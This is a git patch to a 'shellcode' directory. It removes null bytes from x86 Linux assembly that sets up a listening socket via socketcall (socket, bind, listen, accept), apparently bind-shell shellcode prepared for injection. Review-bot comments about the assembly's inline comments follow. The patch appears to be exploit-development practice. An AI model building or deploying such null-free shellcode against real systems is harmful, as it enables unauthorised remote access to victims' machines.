From 3cf4e37c624fe1ac16ed11eb9ad167941b074e23 Mon Sep 17 00:00:00 2001
From: toni
Date: Sun, 9 Nov 2014 07:59:11 +0100
Subject: - removed \x00 in socket.asm - exploit.sh -> socket.o
---
shellcode/simple2.c | 9 ---------
shellcode/socket.asm | 17 +++++++++++------
2 files changed, 11 insertions(+), 15 deletions(-)
delete mode 100644 shellcode/simple2.c
(limited to 'shellcode')
diff --git a/shellcode/simple2.c b/shellcode/simple2.c
deleted file mode 100644
index 341b2de..0000000
--- a/shellcode/simple2.c
+++ /dev/null
@@ -1,9 +0,0 @@
-#include
-#include
-
-int _start(void) {
- while (1) {
- //printf("Shellcode!\n");
- }
- return (0);
-}
diff --git a/shellcode/socket.asm b/shellcode/socket.asm
index 76b8103..1cbd9d4 100644
--- a/shellcode/socket.asm
+++ b/shellcode/socket.asm
@@ -3,9 +3,10 @@ BITS 32 ; socket()
 xor eax,eax ; zero out eax
+xor ebx,ebx ; " " ebx
 push eax ; push 0x0 on the stack: arg3(protocol) -> 0
-mov ebx,0x01 ; socket sub-syscall: 0x01 -> socket()
-push 0x01 ; socket type: 0x01 -> SOCK_STREAM
+mov bl,0x1 ; socket sub-syscall: 0x01 -> socket()
+push ebx ; socket type: 0x01 -> SOCK_STREAM
 push 0x02 ; socket domain: 0x02 -> AF_INET
 mov ecx,esp ; let ecx point to our structure above
 mov al,0x66 ; socketcall syscall 0x66
@@ -25,7 +26,8 @@ push edx ; arg1: push sockfd ; arg2
 mov ecx,esp ; move stack pointer to reg (conform to socketcall) ; arg1
-mov ebx,0x02 ; set socket subcall to 0x03 (bind)
+xor ebx,ebx
+mov bl,0x2 ; set socket subcall to 0x03 (bind)
 mov al,0x66 ; socketcall syscall
 int 0x80 ; let the kernel do the stuff
@@ -35,7 +37,8 @@ push eax ; backlog
 push edx ; sockfd
 mov ecx,esp ; save stackptr
 mov al,0x66 ; socketcall()
-mov ebx,0x4 ; socketcall 0x4 -> listen()
+xor ebx,ebx
+mov bl,0x4 ; socketcall 0x4 -> listen()
 int 0x80 ; kernel mode ; accept()
@@ -49,7 +52,8 @@ push esp ; pointer to sock addrlen
 push ecx ; push sockaddr_in
 push edx ; sockfd
 mov ecx,esp
-mov ebx,0x5
+xor ebx,ebx
+mov bl,0x5
 mov al,0x66
 int 0x80
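Review bot: The comment carried onto the new `mov bl,0x2` line in the bind() hunk still reads `set socket subcall to 0x03 (bind)` while the immediate loaded is 0x2, so the comment contradicts the instruction it annotates; the removed line already had the same 0x02/0x03 mismatch, so this predates the commit, but the rewrite is the natural place to fix it, e.g. `mov bl,0x2 ; socket subcall 0x2 -> bind()`. The added `xor ebx,ebx` in the same hunk has no comment, unlike its counterpart in the socket() hunk, and `xor ebx,ebx ; zero out ebx` would keep the two sections consistent. The same uncommented `xor ebx,ebx` is added in the listen(), accept() and exit() hunks. The bind() sequence starts before this hunk.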
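Review bot: The accept() hunk's new `mov bl,0x5` is the only subcall selector in the file without a comment saying which socketcall it selects, so a reader has to scroll back to the `; accept()` section header to interpret the constant. Mirroring the wording the listen() hunk already uses, `mov bl,0x5 ; socketcall 0x5 -> accept()` makes the line self-describing. The neighbouring context lines `mov ecx,esp`, `mov al,0x66` and `int 0x80` in this hunk are likewise bare, whereas the socket() and bind() hunks annotate each of them; the accept() sequence begins before this hunk.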
@@ -78,5 +82,6 @@ int 0x80 ; exit()
 mov al,0x1 ; exit syscall
-mov ebx,0x42 ; return code
+xor ebx,ebx
+mov bl,0x42 ; return code
 int 0x80 ; kernel mode
--
cgit v1.2.3